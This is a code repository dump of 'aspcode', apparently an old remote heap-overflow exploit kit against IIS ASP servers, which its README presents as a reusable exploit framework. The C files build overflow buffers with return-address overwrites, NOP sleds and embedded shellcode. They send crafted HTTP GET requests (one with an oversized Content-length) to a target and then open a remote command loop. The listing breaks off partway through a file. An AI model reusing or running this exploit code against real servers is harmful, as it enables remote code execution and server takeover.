├── .gitattributes
├── .gitignore
├── README.md
├── asp
    ├── Debug
    │   ├── main.exe
    │   ├── main.ilk
    │   ├── main.obj
    │   ├── main.pch
    │   ├── main.pdb
    │   ├── vc60.idb
    │   └── vc60.pdb
    ├── getoverstr.c
    ├── main.c
    ├── main.dsp
    ├── main.dsw
    ├── main.ncb
    ├── main.opt
    ├── main.plg
    └── shellcode.c
├── aspcode
    ├── Debug
    │   ├── main.exe
    │   ├── main.ilk
    │   ├── main.obj
    │   ├── main.pch
    │   ├── main.pdb
    │   ├── vc60.idb
    │   └── vc60.pdb
    ├── getoverstr.c
    ├── getshellcode.c
    ├── main.c
    ├── main.dsp
    ├── main.dsw
    ├── main.ncb
    ├── main.opt
    ├── main.plg
    ├── overinfo.c
    └── shellcode.c
├── aspcodeview
    ├── Debug
    │   ├── main.exe
    │   ├── main.ilk
    │   ├── main.obj
    │   ├── main.pch
    │   ├── main.pdb
    │   ├── vc60.idb
    │   └── vc60.pdb
    ├── getoverstr.c
    ├── getshellcode.c
    ├── main.c
    ├── main.dsp
    ├── main.dsw
    ├── main.ncb
    ├── main.opt
    ├── main.plg
    ├── overinfo.c
    └── shellcode.c
└── include
    ├── cmd.c
    ├── getoverstr.c
    ├── getshellcode.c
    ├── getvar.c
    ├── inout.c
    ├── jmpadd.h
    ├── over.c
    ├── overinfo.c
    ├── sendrecv.c
    └── shellcode.c


/.gitattributes:
--------------------------------------------------------------------------------
 1 | # Auto detect text files and perform LF normalization
 2 | * text=auto
 3 | 
 4 | # Custom for Visual Studio
 5 | *.cs     diff=csharp
 6 | 
 7 | # Standard to msysgit
 8 | *.doc	 diff=astextplain
 9 | *.DOC	 diff=astextplain
10 | *.docx diff=astextplain
11 | *.DOCX diff=astextplain
12 | *.dot  diff=astextplain
13 | *.DOT  diff=astextplain
14 | *.pdf  diff=astextplain
15 | *.PDF	 diff=astextplain
16 | *.rtf	 diff=astextplain
17 | *.RTF	 diff=astextplain
18 | 


--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
 1 | # Windows image file caches
 2 | Thumbs.db
 3 | ehthumbs.db
 4 | 
 5 | # Folder config file
 6 | Desktop.ini
 7 | 
 8 | # Recycle Bin used on file shares
 9 | $RECYCLE.BIN/
10 | 
11 | # Windows Installer files
12 | *.cab
13 | *.msi
14 | *.msm
15 | *.msp
16 | 
17 | # Windows shortcuts
18 | *.lnk
19 | 
20 | # =========================
21 | # Operating System Files
22 | # =========================
23 | 
24 | # OSX
25 | # =========================
26 | 
27 | .DS_Store
28 | .AppleDouble
29 | .LSOverride
30 | 
31 | # Thumbnails
32 | ._*
33 | 
34 | # Files that might appear on external disk
35 | .Spotlight-V100
36 | .Trashes
37 | 
38 | # Directories potentially created on remote AFP share
39 | .AppleDB
40 | .AppleDesktop
41 | Network Trash Folder
42 | Temporary Items
43 | .apdisk
44 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # aspcode
2 | aspcode堆溢出利用代码
3 | 
4 | aspcode确实算得上比较经典的堆溢出利用代码，原来发布的aspcode.c代码里面用于各种调试的垃圾代码比较多，很多人看不怎么明白。这个是自己用的一直没有对外发布的“潜入者”版本。利用代码已经整理出远程溢出漏洞利用的框架，可以用于各种漏洞利用代码的复用。
5 | 
6 | 以及其它两个asp的利用代码，asp早期的asp溢出，搞定了cxxs以及eeye等，aspcodeiew 是利用asp查看php、cgi等源码的利用代码。
7 | 


--------------------------------------------------------------------------------
/asp/Debug/main.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/yuange75/aspcode/63ee018cd3a70e4bc4b7274f83e5d1c1cfc87d91/asp/Debug/main.exe


--------------------------------------------------------------------------------
/asp/Debug/main.ilk:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/yuange75/aspcode/63ee018cd3a70e4bc4b7274f83e5d1c1cfc87d91/asp/Debug/main.ilk


--------------------------------------------------------------------------------
/asp/Debug/main.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/yuange75/aspcode/63ee018cd3a70e4bc4b7274f83e5d1c1cfc87d91/asp/Debug/main.obj


--------------------------------------------------------------------------------
/asp/Debug/main.pch:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/yuange75/aspcode/63ee018cd3a70e4bc4b7274f83e5d1c1cfc87d91/asp/Debug/main.pch


--------------------------------------------------------------------------------
/asp/Debug/main.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/yuange75/aspcode/63ee018cd3a70e4bc4b7274f83e5d1c1cfc87d91/asp/Debug/main.pdb


--------------------------------------------------------------------------------
/asp/Debug/vc60.idb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/yuange75/aspcode/63ee018cd3a70e4bc4b7274f83e5d1c1cfc87d91/asp/Debug/vc60.idb


--------------------------------------------------------------------------------
/asp/Debug/vc60.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/yuange75/aspcode/63ee018cd3a70e4bc4b7274f83e5d1c1cfc87d91/asp/Debug/vc60.pdb


--------------------------------------------------------------------------------
/asp/getoverstr.c:
--------------------------------------------------------------------------------
 1 | 
 2 | 
 3 | 
 4 | int  getoverbuff(char *overbuff)
 5 | {
 6 | 
 7 |  //*********************************************************************************************
 8 |   
 9 |   char  *eipretwin2000add=eipretwin2000;
10 |   char  *eipjmpespwin2000add=eipjmpespwin2000;
11 |   char  *eipjmpebxwin2000add=eipjmpebxwin2000;
12 |   char  *eipjmpeaxwin2000add=eipjmpeaxwin2000;
13 | 
14 |   //*********************************************************************************************
15 | 
16 |   
17 |  
18 | 
19 |   char  buff[BUFFSIZE];
20 | //  char  widecharbuff[0x100];
21 |   int   i,j,k,l;
22 | 
23 |   memset(buff,NOPCODE,BUFFSIZE);
24 | 
25 |   
26 | 
27 |  for(i=0x124;i<=0x200;i+=8){
28 |    memcpy(buff+offset+i,"\x42\x42\x42\x2d",4);  //  0x2d  sub eax,num32
29 |    memcpy(buff+offset+i+4,eipjmpebxwin2000,4);
30 |   }     
31 |  for(i=0x404;i<=0x500;i+=8){
32 |    memcpy(buff+offset+i,"\x42\x42\x42\x2d",4);  //  0x2d  sub eax,num32
33 |    memcpy(buff+offset+i+4,eipjmpebxwin2000,4);
34 |   }
35 |  
36 |  for(i=0x220;i<=0x380;i+=8){
37 |    memcpy(buff+offset+i,"\x42\x42\x42\x2d",4);  //  0x2d  sub eax,num32
38 |    memcpy(buff+offset+i+4,eipjmpebxwin2000,4);
39 |   }     
40 |  for(i=0x580;i<=0x728;i+=8){
41 |    memcpy(buff+offset+i,"\x42\x42\x42\x2d",4);  //  0x2d  sub eax,num32
42 |    memcpy(buff+offset+i+4,eipjmpebxwin2000,4);
43 |   }     
44 | 
45 |   strcpy(buff+0x10000-4,".asp");
46 |  
47 |   strcpy(overbuff,buff);
48 |   return strlen(buff);
49 | }
50 | 
51 | 
52 | 
53 | int  GetOverStr(char *buffer,char *server,char *urlfile,int offset2)
54 | {
55 | 
56 |   char    findshellcodebuff[BUFFSIZE];
57 |   char    shellcodebuff[BUFFSIZE];
58 |   char    overbuff[BUFFSIZE];
59 |   int     i,findshellbytes,postbytes;
60 | 
61 |   char    *url="/default.asp";
62 | 
63 |   char    overstr[]="GET %s%s?koko HTTP/1.1\r\nHOST:%s\r\nContent-Type: text/html\r\n\r\n";
64 |  
65 |   if(urlfile!=NULL) url=urlfile;
66 | 
67 |   offset=offset-strlen(url)-4;
68 | 
69 |   i=getoverbuff(overbuff);
70 |  // findshellbytes=GetFindShellcode(findshellcodebuff);
71 |   postbytes=GetShellcode(shellcodebuff);
72 |   memcpy(overbuff+0x730,shellcodebuff,postbytes);
73 | 
74 |   _snprintf(buffer,BUFFSIZE,overstr,url,overbuff,server); //,i,overbuff); //,shellcodebuff);
75 |  
76 |  // strcpy(buffer+strlen(buffer)+1,shellcodebuff);
77 | 
78 |   return (strlen(buffer)); //+postbytes+1);
79 | }
80 | 
81 | 
82 | 


--------------------------------------------------------------------------------
/asp/main.c:
--------------------------------------------------------------------------------
 1 | #include <windows.h> 
 2 | #include <winsock.h>
 3 | #include <stdio.h>
 4 | #include <httpext.h>
 5 | 
 6 | #pragma  comment(lib,"ws2_32")
 7 | 
 8 | #include "..\include\main.h"
 9 | #include "..\include\jmpadd.h"
10 | #include "..\include\inout.c"
11 | #include "..\include\getvar.c"
12 | #include "..\include\cmd.c"
13 | #include "..\include\sendrecv.c"
14 | #include "..\include\over.c"
15 | #include "..\include\getshellcode.c"
16 | #include "..\include\overinfo.c"
17 | 
18 | 
19 | #include "shellcode.c"
20 | 
21 | #include "getoverstr.c"
22 | 
23 | 
24 | 
25 | int main(int argc, char **argv)
26 | { 
27 |   
28 |   int     fd;
29 |   getvar(argc,argv);
30 |   fd=server_socket;
31 |   
32 |  
33 |   over(fd);
34 |   shellcmd(fd);
35 | 
36 |   closesocket(fd);
37 |   WSACleanup( );
38 |   return(0);
39 | }
40 | 


--------------------------------------------------------------------------------
/asp/main.dsp:
--------------------------------------------------------------------------------
 1 | # Microsoft Developer Studio Project File - Name="main" - Package Owner=<4>
 2 | # Microsoft Developer Studio Generated Build File, Format Version 6.00
 3 | # ** DO NOT EDIT **
 4 | 
 5 | # TARGTYPE "Win32 (x86) Console Application" 0x0103
 6 | 
 7 | CFG=main - Win32 Debug
 8 | !MESSAGE This is not a valid makefile. To build this project using NMAKE,
 9 | !MESSAGE use the Export Makefile command and run
10 | !MESSAGE 
11 | !MESSAGE NMAKE /f "main.mak".
12 | !MESSAGE 
13 | !MESSAGE You can specify a configuration when running NMAKE
14 | !MESSAGE by defining the macro CFG on the command line. For example:
15 | !MESSAGE 
16 | !MESSAGE NMAKE /f "main.mak" CFG="main - Win32 Debug"
17 | !MESSAGE 
18 | !MESSAGE Possible choices for configuration are:
19 | !MESSAGE 
20 | !MESSAGE "main - Win32 Release" (based on "Win32 (x86) Console Application")
21 | !MESSAGE "main - Win32 Debug" (based on "Win32 (x86) Console Application")
22 | !MESSAGE 
23 | 
24 | # Begin Project
25 | # PROP AllowPerConfigDependencies 0
26 | # PROP Scc_ProjName ""
27 | # PROP Scc_LocalPath ""
28 | CPP=cl.exe
29 | RSC=rc.exe
30 | 
31 | !IF  "$(CFG)" == "main - Win32 Release"
32 | 
33 | # PROP BASE Use_MFC 0
34 | # PROP BASE Use_Debug_Libraries 0
35 | # PROP BASE Output_Dir "Release"
36 | # PROP BASE Intermediate_Dir "Release"
37 | # PROP BASE Target_Dir ""
38 | # PROP Use_MFC 0
39 | # PROP Use_Debug_Libraries 0
40 | # PROP Output_Dir "Release"
41 | # PROP Intermediate_Dir "Release"
42 | # PROP Target_Dir ""
43 | # ADD BASE CPP /nologo /W3 /GX /O2 /D "WIN32" /D "NDEBUG" /D "_CONSOLE" /D "_MBCS" /YX /FD /c
44 | # ADD CPP /nologo /W3 /GX /O2 /D "WIN32" /D "NDEBUG" /D "_CONSOLE" /D "_MBCS" /YX /FD /c
45 | # ADD BASE RSC /l 0x804 /d "NDEBUG"
46 | # ADD RSC /l 0x804 /d "NDEBUG"
47 | BSC32=bscmake.exe
48 | # ADD BASE BSC32 /nologo
49 | # ADD BSC32 /nologo
50 | LINK32=link.exe
51 | # ADD BASE LINK32 kernel32.lib user32.lib gdi32.lib winspool.lib comdlg32.lib advapi32.lib shell32.lib ole32.lib oleaut32.lib uuid.lib odbc32.lib odbccp32.lib /nologo /subsystem:console /machine:I386
52 | # ADD LINK32 kernel32.lib user32.lib gdi32.lib winspool.lib comdlg32.lib advapi32.lib shell32.lib ole32.lib oleaut32.lib uuid.lib odbc32.lib odbccp32.lib /nologo /subsystem:console /machine:I386
53 | 
54 | !ELSEIF  "$(CFG)" == "main - Win32 Debug"
55 | 
56 | # PROP BASE Use_MFC 0
57 | # PROP BASE Use_Debug_Libraries 1
58 | # PROP BASE Output_Dir "Debug"
59 | # PROP BASE Intermediate_Dir "Debug"
60 | # PROP BASE Target_Dir ""
61 | # PROP Use_MFC 0
62 | # PROP Use_Debug_Libraries 1
63 | # PROP Output_Dir "Debug"
64 | # PROP Intermediate_Dir "Debug"
65 | # PROP Target_Dir ""
66 | # ADD BASE CPP /nologo /W3 /Gm /GX /ZI /Od /D "WIN32" /D "_DEBUG" /D "_CONSOLE" /D "_MBCS" /YX /FD /GZ /c
67 | # ADD CPP /nologo /W3 /Gm /GX /ZI /Od /D "WIN32" /D "_DEBUG" /D "_CONSOLE" /D "_MBCS" /YX /FD /GZ /c
68 | # ADD BASE RSC /l 0x804 /d "_DEBUG"
69 | # ADD RSC /l 0x804 /d "_DEBUG"
70 | BSC32=bscmake.exe
71 | # ADD BASE BSC32 /nologo
72 | # ADD BSC32 /nologo
73 | LINK32=link.exe
74 | # ADD BASE LINK32 kernel32.lib user32.lib gdi32.lib winspool.lib comdlg32.lib advapi32.lib shell32.lib ole32.lib oleaut32.lib uuid.lib odbc32.lib odbccp32.lib /nologo /subsystem:console /debug /machine:I386 /pdbtype:sept
75 | # ADD LINK32 kernel32.lib user32.lib gdi32.lib winspool.lib comdlg32.lib advapi32.lib shell32.lib ole32.lib oleaut32.lib uuid.lib odbc32.lib odbccp32.lib /nologo /subsystem:console /debug /machine:I386 /pdbtype:sept
76 | 
77 | !ENDIF 
78 | 
79 | # Begin Target
80 | 
81 | # Name "main - Win32 Release"
82 | # Name "main - Win32 Debug"
83 | # Begin Source File
84 | 
85 | SOURCE=.\main.c
86 | # End Source File
87 | # End Target
88 | # End Project
89 | 


--------------------------------------------------------------------------------
/asp/main.dsw:
--------------------------------------------------------------------------------
 1 | Microsoft Developer Studio Workspace File, Format Version 6.00
 2 | # WARNING: DO NOT EDIT OR DELETE THIS WORKSPACE FILE!
 3 | 
 4 | ###############################################################################
 5 | 
 6 | Project: "main"=.\main.dsp - Package Owner=<4>
 7 | 
 8 | Package=<5>
 9 | {{{
10 | }}}
11 | 
12 | Package=<4>
13 | {{{
14 | }}}
15 | 
16 | ###############################################################################
17 | 
18 | Global:
19 | 
20 | Package=<5>
21 | {{{
22 | }}}
23 | 
24 | Package=<3>
25 | {{{
26 | }}}
27 | 
28 | ###############################################################################
29 | 
30 | 


--------------------------------------------------------------------------------
/asp/main.ncb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/yuange75/aspcode/63ee018cd3a70e4bc4b7274f83e5d1c1cfc87d91/asp/main.ncb


--------------------------------------------------------------------------------
/asp/main.opt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/yuange75/aspcode/63ee018cd3a70e4bc4b7274f83e5d1c1cfc87d91/asp/main.opt


--------------------------------------------------------------------------------
/asp/main.plg:
--------------------------------------------------------------------------------
 1 | <html>
 2 | <body>
 3 | <pre>
 4 | <h1>Build Log</h1>
 5 | <h3>
 6 | --------------------Configuration: main - Win32 Debug--------------------
 7 | </h3>
 8 | <h3>Command Lines</h3>
 9 | Creating temporary file "D:\DOCUME~1\ADMINI~1.GUE\LOCALS~1\Temp\RSP6A.tmp" with contents
10 | [
11 | /nologo /MLd /W3 /Gm /GX /ZI /Od /D "WIN32" /D "_DEBUG" /D "_CONSOLE" /D "_MBCS" /Fp"Debug/main.pch" /YX /Fo"Debug/" /Fd"Debug/" /FD /GZ /c 
12 | "C:\T2306\asp\main.c"
13 | ]
14 | Creating command line "cl.exe @D:\DOCUME~1\ADMINI~1.GUE\LOCALS~1\Temp\RSP6A.tmp" 
15 | Creating temporary file "D:\DOCUME~1\ADMINI~1.GUE\LOCALS~1\Temp\RSP6B.tmp" with contents
16 | [
17 | kernel32.lib user32.lib gdi32.lib winspool.lib comdlg32.lib advapi32.lib shell32.lib ole32.lib oleaut32.lib uuid.lib odbc32.lib odbccp32.lib /nologo /subsystem:console /incremental:yes /pdb:"Debug/main.pdb" /debug /machine:I386 /out:"Debug/main.exe" /pdbtype:sept 
18 | .\Debug\main.obj
19 | ]
20 | Creating command line "link.exe @D:\DOCUME~1\ADMINI~1.GUE\LOCALS~1\Temp\RSP6B.tmp"
21 | <h3>Output Window</h3>
22 | Compiling...
23 | main.c
24 | c:\t2306\include\inout.c(30) : warning C4047: 'initializing' : 'int *' differs in levels of indirection from 'const char ** '
25 | c:\t2306\include\getvar.c(30) : warning C4018: '<' : signed/unsigned mismatch
26 | c:\t2306\include\sendrecv.c(32) : warning C4047: '=' : 'int ' differs in levels of indirection from 'char *'
27 | c:\t2306\include\sendrecv.c(33) : warning C4022: 'memcpy' : pointer mismatch for actual parameter 1
28 | c:\t2306\include\over.c(8) : warning C4013: 'GetOverStr' undefined; assuming extern returning int
29 | c:\t2306\include\getshellcode.c(12) : warning C4047: 'function' : 'char *' differs in levels of indirection from 'void (__cdecl *)()'
30 | c:\t2306\include\getshellcode.c(12) : warning C4024: 'getfnaddress' : different types for formal and actual parameter 1
31 | c:\t2306\include\getshellcode.c(22) : warning C4047: 'function' : 'char *' differs in levels of indirection from 'void (__cdecl *)()'
32 | c:\t2306\include\getshellcode.c(22) : warning C4024: 'getfnaddress' : different types for formal and actual parameter 1
33 | c:\t2306\include\getshellcode.c(34) : warning C4013: '_chkesp' undefined; assuming extern returning int
34 | c:\t2306\include\getshellcode.c(35) : warning C4047: 'function' : 'char *' differs in levels of indirection from 'int (__cdecl *)()'
35 | c:\t2306\include\getshellcode.c(35) : warning C4024: 'getfnaddress' : different types for formal and actual parameter 1
36 | c:\t2306\include\getshellcode.c(10) : warning C4101: 'j' : unreferenced local variable
37 | c:\t2306\include\getshellcode.c(54) : warning C4047: 'function' : 'char *' differs in levels of indirection from 'void (__cdecl *)()'
38 | c:\t2306\include\getshellcode.c(54) : warning C4024: 'getfnaddress' : different types for formal and actual parameter 1
39 | c:\t2306\include\getshellcode.c(64) : warning C4047: 'function' : 'char *' differs in levels of indirection from 'void (__cdecl *)(char *)'
40 | c:\t2306\include\getshellcode.c(64) : warning C4024: 'getfnaddress' : different types for formal and actual parameter 1
41 | c:\t2306\include\getshellcode.c(77) : warning C4047: 'function' : 'char *' differs in levels of indirection from 'int (__cdecl *)()'
42 | c:\t2306\include\getshellcode.c(77) : warning C4024: 'getfnaddress' : different types for formal and actual parameter 1
43 | c:\t2306\include\getshellcode.c(109) : warning C4305: '=' : truncation from 'const int ' to 'char '
44 | c:\t2306\asp\shellcode.c(96) : warning C4102: 'next' : unreferenced label
45 | c:\t2306\asp\shellcode.c(181) : warning C4047: 'initializing' : 'int (__stdcall *)()' differs in levels of indirection from 'char *'
46 | c:\t2306\asp\shellcode.c(205) : warning C4047: '=' : 'int *' differs in levels of indirection from 'const unsigned int '
47 | c:\t2306\asp\shellcode.c(206) : warning C4133: '=' : incompatible types - from 'char *' to 'int *'
48 | c:\t2306\asp\shellcode.c(219) : warning C4047: '=' : 'void *' differs in levels of indirection from 'int '
49 | c:\t2306\asp\shellcode.c(226) : warning C4047: '=' : 'int (__stdcall *)()' differs in levels of indirection from 'int '
50 | c:\t2306\asp\shellcode.c(238) : warning C4047: '=' : 'int ' differs in levels of indirection from 'char *'
51 | c:\t2306\asp\shellcode.c(241) : warning C4047: '=' : 'void *' differs in levels of indirection from 'int '
52 | c:\t2306\asp\shellcode.c(242) : warning C4047: '=' : 'int (__stdcall *)()' differs in levels of indirection from 'int '
53 | c:\t2306\asp\shellcode.c(249) : warning C4047: '=' : 'int ' differs in levels of indirection from 'char *'
54 | c:\t2306\asp\shellcode.c(250) : warning C4047: '=' : 'char *' differs in levels of indirection from 'int '
55 | c:\t2306\asp\shellcode.c(271) : warning C4047: '=' : 'int ' differs in levels of indirection from 'int (__stdcall *)()'
56 | c:\t2306\asp\shellcode.c(272) : warning C4047: '=' : 'int ' differs in levels of indirection from 'int (__stdcall *)()'
57 | c:\t2306\asp\shellcode.c(277) : warning C4047: '=' : 'int ' differs in levels of indirection from 'char *'
58 | c:\t2306\asp\shellcode.c(279) : warning C4047: '=' : 'char *' differs in levels of indirection from 'int '
59 | c:\t2306\asp\shellcode.c(285) : warning C4047: '==' : 'int ' differs in levels of indirection from 'int *'
60 | c:\t2306\asp\shellcode.c(302) : warning C4047: '==' : 'int ' differs in levels of indirection from 'int (__stdcall *)()'
61 | c:\t2306\asp\shellcode.c(303) : warning C4047: '=' : 'int ' differs in levels of indirection from 'char *'
62 | c:\t2306\asp\shellcode.c(307) : warning C4047: '=' : 'int ' differs in levels of indirection from 'int (__stdcall *)()'
63 | c:\t2306\asp\shellcode.c(313) : warning C4047: '=' : 'int (__stdcall *)()' differs in levels of indirection from 'int '
64 | c:\t2306\asp\shellcode.c(314) : warning C4047: '=' : 'int (__stdcall *)()' differs in levels of indirection from 'int '
65 | c:\t2306\asp\shellcode.c(315) : warning C4047: '=' : 'void *' differs in levels of indirection from 'int '
66 | c:\t2306\asp\shellcode.c(317) : warning C4047: '=' : 'char *' differs in levels of indirection from 'int '
67 | c:\t2306\asp\shellcode.c(656) : warning C4102: 'execptprogram' : unreferenced label
68 | c:\t2306\asp\shellcode.c(161) : warning C4101: 'msvcrtdlladd' : unreferenced local variable
69 | c:\t2306\asp\shellcode.c(160) : warning C4101: 'memcpyadd' : unreferenced local variable
70 | c:\t2306\asp\shellcode.c(163) : warning C4101: 'Aspdlladd' : unreferenced local variable
71 | c:\t2306\asp\getoverstr.c(21) : warning C4101: 'j' : unreferenced local variable
72 | c:\t2306\asp\getoverstr.c(21) : warning C4101: 'k' : unreferenced local variable
73 | c:\t2306\asp\getoverstr.c(21) : warning C4101: 'l' : unreferenced local variable
74 | c:\t2306\asp\getoverstr.c(59) : warning C4101: 'findshellbytes' : unreferenced local variable
75 | c:\t2306\asp\getoverstr.c(56) : warning C4101: 'findshellcodebuff' : unreferenced local variable
76 | Linking...
77 | 
78 | 
79 | 
80 | <h3>Results</h3>
81 | main.exe - 0 error(s), 52 warning(s)
82 | </pre>
83 | </body>
84 | </html>
85 | 


--------------------------------------------------------------------------------
/asp/shellcode.c:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/yuange75/aspcode/63ee018cd3a70e4bc4b7274f83e5d1c1cfc87d91/asp/shellcode.c


--------------------------------------------------------------------------------
/aspcode/Debug/main.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/yuange75/aspcode/63ee018cd3a70e4bc4b7274f83e5d1c1cfc87d91/aspcode/Debug/main.exe


--------------------------------------------------------------------------------
/aspcode/Debug/main.ilk:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/yuange75/aspcode/63ee018cd3a70e4bc4b7274f83e5d1c1cfc87d91/aspcode/Debug/main.ilk


--------------------------------------------------------------------------------
/aspcode/Debug/main.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/yuange75/aspcode/63ee018cd3a70e4bc4b7274f83e5d1c1cfc87d91/aspcode/Debug/main.obj


--------------------------------------------------------------------------------
/aspcode/Debug/main.pch:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/yuange75/aspcode/63ee018cd3a70e4bc4b7274f83e5d1c1cfc87d91/aspcode/Debug/main.pch


--------------------------------------------------------------------------------
/aspcode/Debug/main.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/yuange75/aspcode/63ee018cd3a70e4bc4b7274f83e5d1c1cfc87d91/aspcode/Debug/main.pdb


--------------------------------------------------------------------------------
/aspcode/Debug/vc60.idb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/yuange75/aspcode/63ee018cd3a70e4bc4b7274f83e5d1c1cfc87d91/aspcode/Debug/vc60.idb


--------------------------------------------------------------------------------
/aspcode/Debug/vc60.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/yuange75/aspcode/63ee018cd3a70e4bc4b7274f83e5d1c1cfc87d91/aspcode/Debug/vc60.pdb


--------------------------------------------------------------------------------
/aspcode/getoverstr.c:
--------------------------------------------------------------------------------
 1 | 
 2 | 
 3 | //#include "getshellcode.c"
 4 | 
 5 | 
 6 | 
 7 | 
 8 | int  getoverbuff(char *overbuff)
 9 | {
10 | 
11 |   #define  MCBSIZE       0x8
12 |   #define  MEMSIZE       0xb200
13 | 
14 |   char buff7[]= "\x10\x00\x01\x02\x03\x04\x05\x06\x1c\xf0\xfd\x7f\x20\x21\x00\x01";
15 |   char buff11[]= "\x02\x00\x01\x02\x03\x04\x05\x06\x22\x22\x00\x01\x22\x22\x00\x01";
16 |   char buff10[]="\x20\x21\x00\x01\x20\x21\x00\x01";
17 |   char buff9[]= "\x20\x21\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30";
18 |   char buff8[]= "\x81\xec\xff\xe4\x90\x90\x90\x90\x90\x90\x90\x90\x90";
19 |  
20 |   
21 |   char  buff[BUFFSIZE];
22 |   int   i,j,k;
23 | 
24 |   memset(buff,NOPCODE,BUFFSIZE);
25 | 
26 | 
27 | 
28 |      buff7[0]=MCBSIZE;
29 |     
30 | 	 j=MEMSIZE+0x10;
31 | 	 i=0;
32 |      for(k=0;i<0xc000;i+=0x10)
33 | 	 {
34 |          if(i>=j)
35 | 		 {
36 | 			  
37 |     		   k=((i-j)/(MCBSIZE*8));
38 |                if(k<=6)
39 | 			   {
40 |                    memcpy(buff7+0x8,buff10,8);
41 | 				   buff7[0x8]=buff8[k];
42 |                    buff7[0xc]=buff9[k];
43 |                }
44 | 			   else memcpy(buff7,buff11,0x10);
45 | 		 }  
46 | 	     memcpy(buff+i,buff7,0x10);
47 | 	   
48 | 	 }
49 | 	 memcpy(overbuff,buff,0xc000);
50 |      return 0xc000;
51 | }
52 | 
53 | 
54 | 
55 | int  GetOverStr(char *buffer,char *server,char *urlfile,int offset)
56 | {
57 | 
58 |   char    shellcodebuff[BUFFSIZE];
59 |   char    overbuff[BUFFSIZE];
60 |   int     i,j;
61 | 
62 |   char    *url="/iisstart.asp";
63 | 
64 |   char    overstr[]="GET %s?!!ko HTTP/1.1\r\nHOST:%s\r\nContent-Type: application/x-www-form-urlencoded%s\r\nContent-length: 2147506431\r\n\r\n";
65 | 
66 |   if(urlfile!=NULL) url=urlfile;
67 | 
68 |   memset(shellcodebuff,'7',BUFFSIZE);//NOPCODE,BUFFSIZE);
69 |   i=getoverbuff(overbuff);
70 |   j=GetShellcode(shellcodebuff+0x1000);
71 |   for(j=0;j<=0xe000;j+=4)
72 |   {
73 |       strcat(shellcodebuff,"\x41\x41\x41\x41"); 
74 |   } 
75 | 
76 |   _snprintf(buffer,BUFFSIZE,overstr,url,server,shellcodebuff);
77 |   j=strlen(buffer);
78 |   memcpy(buffer+j,overbuff,i);
79 |   return (j+i);
80 | }


--------------------------------------------------------------------------------
/aspcode/getshellcode.c:
--------------------------------------------------------------------------------
 1 | 
 2 | // #include   "shellcode.c"
 3 | 
 4 | int  GetShellcode(char *buffer)
 5 | {
 6 | 
 7 |   char    *fnendstr="\x90\x90\x90\x90\x90\x90\x90\x90\x90";
 8 |   char    *shellcodefnadd,*chkespadd;
 9 |   char    shellcodebuff[BUFFSIZE];
10 |   int     i,j,k;
11 |  
12 |   shellcodefnadd=getfnaddress(shellcodefnlock);
13 |   
14 |   for(k=0;k<=BUFFSIZE;++k){
15 | 		 if(memcmp(shellcodefnadd+k,fnendstr,FNENDLONG)==0) break;
16 |   }
17 |   for(i=0;i<=BUFFSIZE;++i){
18 | 		 if(memcmp(shellcodefnadd+k+FNENDLONG+i,fnendstr,FNENDLONG)==0) break;
19 |   }
20 |   memcpy(buffer,shellcodefnadd+k+FNENDLONG,i);
21 | 
22 |   shellcodefnadd=getfnaddress(shellcodefn);
23 | 
24 |   for(k=0;k<=BUFFSIZE;++k){
25 | 		 if(memcmp(shellcodefnadd+k,fnendstr,FNENDLONG)==0) break;
26 |   }
27 | 
28 |   memcpy(shellcodebuff,shellcodefnadd,k); 
29 | 
30 |   _asm{
31 | 		 mov ESI,ESP
32 | 		 cmp ESI,ESP
33 |   }
34 |   _chkesp();
35 |   chkespadd=getfnaddress(_chkesp);
36 |   
37 |   cleanchkesp(shellcodefnadd,shellcodebuff,chkespadd,k);
38 |   j=getapistr(shellcodebuff+k);
39 |   k=k+j;
40 |   k=codeshell(buffer+i,BUFFSIZE-i,shellcodebuff,k);
41 |   i=i+k;
42 | 
43 |   return i;
44 | }
45 | 
46 | 
47 | 
48 | 
49 | void cleanchkesp(char *fnadd,char *shellbuff,char *chkesp,int len)
50 | { 
51 |    int i,k;
52 |    unsigned char temp;
53 |    char *calladd;
54 | 
55 |    for(i=0;i<len;++i)
56 |    {
57 | 	   temp=shellbuff[i];
58 |        if(temp==0xe8)
59 | 	   {
60 |          k=*(int *)(shellbuff+i+1);
61 | 		 calladd=fnadd;
62 | 		 calladd+=k;
63 | 		 calladd+=i;
64 | 		 calladd+=5;
65 | 		 if(calladd==chkesp)
66 | 		 {
67 | 			 shellbuff[i]=0x90;
68 | 			 shellbuff[i+1]=0x43;   // inc ebx
69 | 		     shellbuff[i+2]=0x4b;	// dec ebx
70 | 			 shellbuff[i+3]=0x43;
71 | 			 shellbuff[i+4]=0x4b;
72 | 		 }
73 | 	   }
74 |    }
75 | }
76 | 
77 | 
78 | char *getfnaddress(char *fn)
79 | {
80 | 	unsigned char temp;
81 |     temp=*fn;
82 |     if(temp==0xe9)
83 | 	{
84 | 		 fn+=*(int*)(fn+1);
85 | 		 fn+=5;
86 | 	}
87 | 	return(fn);
88 | }
89 |  	
90 | 


--------------------------------------------------------------------------------
/aspcode/main.c:
--------------------------------------------------------------------------------
 1 | #include <windows.h> 
 2 | #include <winsock.h>
 3 | #include <stdio.h>
 4 | #include <httpext.h>
 5 | #include "..\include\main.h"
 6 | #include "..\include\jmpadd.h"
 7 | 
 8 | 
 9 | #pragma  comment(lib,"ws2_32")
10 | 
11 | 
12 | #include "..\include\inout.c"
13 | #include "..\include\getvar.c"
14 | #include "..\include\cmd.c"
15 | #include "..\include\sendrecv.c"
